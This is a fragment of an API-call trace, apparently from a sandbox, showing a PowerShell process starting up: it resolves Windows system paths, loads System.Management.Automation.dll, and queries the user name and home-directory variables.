	[0056.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.135] GetLastError () returned 0xcb
	[0056.135] SetErrorMode (uMode=0x1) returned 0x1
	[0056.135] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x247fcc4 | out: lpFileInformation=0x247fcc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0056.135] GetLastError () returned 0xcb
	[0056.135] SetErrorMode (uMode=0x1) returned 0x1
	[0056.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22ddcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.135] GetLastError () returned 0xcb
	[0056.135] SetErrorMode (uMode=0x1) returned 0x1
	[0056.135] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x247fe58 | out: lpFileInformation=0x247fe58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0056.136] GetLastError () returned 0xcb
	[0056.136] SetErrorMode (uMode=0x1) returned 0x1
	[0056.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.141] GetLastError () returned 0xcb
	[0056.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.229] GetLastError () returned 0xcb
	[0056.230] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22de90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0056.230] GetLastError () returned 0xcb
	[0056.230] SetErrorMode (uMode=0x1) returned 0x1
	[0056.230] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22e310 | out: lpFileInformation=0x22e310*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0056.230] GetLastError () returned 0xcb
	[0056.230] SetErrorMode (uMode=0x1) returned 0x1
	[0056.230] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22de90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0056.230] GetLastError () returned 0xcb
	[0056.230] SetErrorMode (uMode=0x1) returned 0x1
	[0056.230] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22e310 | out: lpFileInformation=0x22e310*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0056.231] GetLastError () returned 0xcb
	[0056.231] SetErrorMode (uMode=0x1) returned 0x1
	[0056.231] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22dea4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0056.231] GetLastError () returned 0xcb
	[0056.231] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22de40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0056.231] GetLastError () returned 0xcb
	[0056.231] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.231] GetLastError () returned 0xcb
	[0056.231] SetErrorMode (uMode=0x1) returned 0x1
	[0056.231] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22e310 | out: lpFileInformation=0x22e310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0056.231] GetLastError () returned 0xcb
	[0056.231] SetErrorMode (uMode=0x1) returned 0x1
	[0056.231] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.231] GetLastError () returned 0xcb
	[0056.231] SetErrorMode (uMode=0x1) returned 0x1
	[0056.231] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22e310 | out: lpFileInformation=0x22e310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0056.231] GetLastError () returned 0xcb
	[0056.231] SetErrorMode (uMode=0x1) returned 0x1
	[0056.231] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.231] GetLastError () returned 0xcb
	[0056.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x22de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.232] GetLastError () returned 0xcb
	[0056.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.232] GetLastError () returned 0xcb
	[0056.232] SetErrorMode (uMode=0x1) returned 0x1
	[0056.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22e310 | out: lpFileInformation=0x22e310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0056.232] GetLastError () returned 0xcb
	[0056.232] SetErrorMode (uMode=0x1) returned 0x1
	[0056.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.232] GetLastError () returned 0xcb
	[0056.232] SetErrorMode (uMode=0x1) returned 0x1
	[0056.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22e310 | out: lpFileInformation=0x22e310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0056.232] GetLastError () returned 0xcb
	[0056.232] SetErrorMode (uMode=0x1) returned 0x1
	[0056.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22dea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.232] GetLastError () returned 0xcb
	[0056.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x22de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.232] GetLastError () returned 0xcb
	[0056.233] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.233] GetLastError () returned 0xcb
	[0056.233] SetErrorMode (uMode=0x1) returned 0x1
	[0056.233] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22e31c | out: lpFileInformation=0x22e31c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0056.233] GetLastError () returned 0xcb
	[0056.233] SetErrorMode (uMode=0x1) returned 0x1
	[0056.233] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.233] GetLastError () returned 0xcb
	[0056.233] SetErrorMode (uMode=0x1) returned 0x1
	[0056.233] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x22e31c | out: lpFileInformation=0x22e31c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0056.233] GetLastError () returned 0xcb
	[0056.233] SetErrorMode (uMode=0x1) returned 0x1
	[0056.233] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x22deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.233] GetLastError () returned 0xcb
	[0056.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x22de4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0056.233] GetLastError () returned 0xcb
	[0056.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.233] GetLastError () returned 0xcb
	[0056.233] SetErrorMode (uMode=0x1) returned 0x1
	[0056.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22e31c | out: lpFileInformation=0x22e31c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0056.234] GetLastError () returned 0xcb
	[0056.234] SetErrorMode (uMode=0x1) returned 0x1
	[0056.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.234] GetLastError () returned 0xcb
	[0056.234] SetErrorMode (uMode=0x1) returned 0x1
	[0056.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22e31c | out: lpFileInformation=0x22e31c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0056.234] GetLastError () returned 0xcb
	[0056.234] SetErrorMode (uMode=0x1) returned 0x1
	[0056.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.234] GetLastError () returned 0xcb
	[0056.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x22de4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.234] GetLastError () returned 0xcb
	[0056.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0056.239] GetLastError () returned 0xcb
	[0056.239] SetErrorMode (uMode=0x1) returned 0x1
	[0056.239] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2487c00 | out: lpFileInformation=0x2487c00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0056.239] GetLastError () returned 0xcb
	[0056.239] SetErrorMode (uMode=0x1) returned 0x1
	[0056.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.241] GetLastError () returned 0xcb
	[0056.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.241] GetLastError () returned 0xcb
	[0056.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.241] GetLastError () returned 0xcb
	[0056.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.241] GetLastError () returned 0xcb
	[0056.586] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e508 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e508) returned 0x1
	[0056.586] GetLastError () returned 0xcb
	[0056.586] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e510 | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e510) returned 1
	[0056.588] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2036a2c*="Available", lpRawData=0x20368e8) returned 1
	[0056.589] GetLastError () returned 0x0
	[0056.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.590] GetLastError () returned 0xcb
	[0056.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.591] GetLastError () returned 0xcb
	[0056.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dfe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.603] GetLastError () returned 0xcb
	[0056.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.603] GetLastError () returned 0xcb
	[0056.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.603] GetLastError () returned 0xcb
	[0056.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.606] GetLastError () returned 0xcb
	[0056.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.606] GetLastError () returned 0xcb
	[0056.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.606] GetLastError () returned 0xcb
	[0056.606] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0056.606] GetLastError () returned 0xcb
	[0056.606] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="\\Users\\2XC7u663GxWc") returned 0x13
	[0056.606] GetLastError () returned 0xcb
	[0056.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.606] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.607] GetLastError () returned 0xcb
	[0056.607] GetCurrentProcessId () returned 0xf04
	[0056.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.608] GetLastError () returned 0xcb
	[0056.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.608] GetLastError () returned 0xcb
	[0056.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.608] GetLastError () returned 0xcb
	[0056.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.608] GetLastError () returned 0xcb
	[0056.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.608] GetLastError () returned 0xcb
	[0056.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
